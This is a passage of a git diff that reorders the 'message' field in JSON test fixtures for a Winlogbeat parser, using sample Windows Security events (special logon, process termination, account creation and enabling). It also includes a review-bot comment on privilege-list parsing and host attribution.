l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session 
:\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte 
:\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json index e5beffcf5..22840d53c 100644 --- a/Beats/winlogbeat/tests/security_event_4689.json +++ b/Beats/winlogbeat/tests/security_event_4689.json 
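Review bot: `PrivilegeList` is a single string with the privileges joined by `\n\t\t\t` (`SeSecurityPrivilege\n\t\t\tSeBackupPrivilege...SeDebugPrivilege...`), so the `expected` assertions — which continue outside the hunk — should confirm the parser splits it into a list; otherwise a rule looking for `SeDebugPrivilege` or `SeLoadDriverPrivilege` in a 4672 has to substring-match through tab runs. This event is also tagged `forwarded` and its `host` object carries only `name` (`USER01-WIN.domain.priv`, matching `winlog.computer_name`) while `agent.name` is `AGENT`; presumably the agent is the collector, not the origin host, so host attribution should come from `winlog.computer_name`/`host.name` and never from `agent.name` — worth pinning in the expected output if it is not already.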
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le 
processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json index 96e08b538..03a0543f5 100644 --- a/Beats/winlogbeat/tests/security_event_4720.json +++ b/Beats/winlogbeat/tests/security_event_4720.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Win
dows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + } }, "expected": { "message": 
"{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Aud
it Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json index 94bd16fdf..99debf8cf 100644 --- a/Beats/winlogbeat/tests/security_event_4722.json +++ b/Beats/winlogbeat/tests/security_event_4722.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount 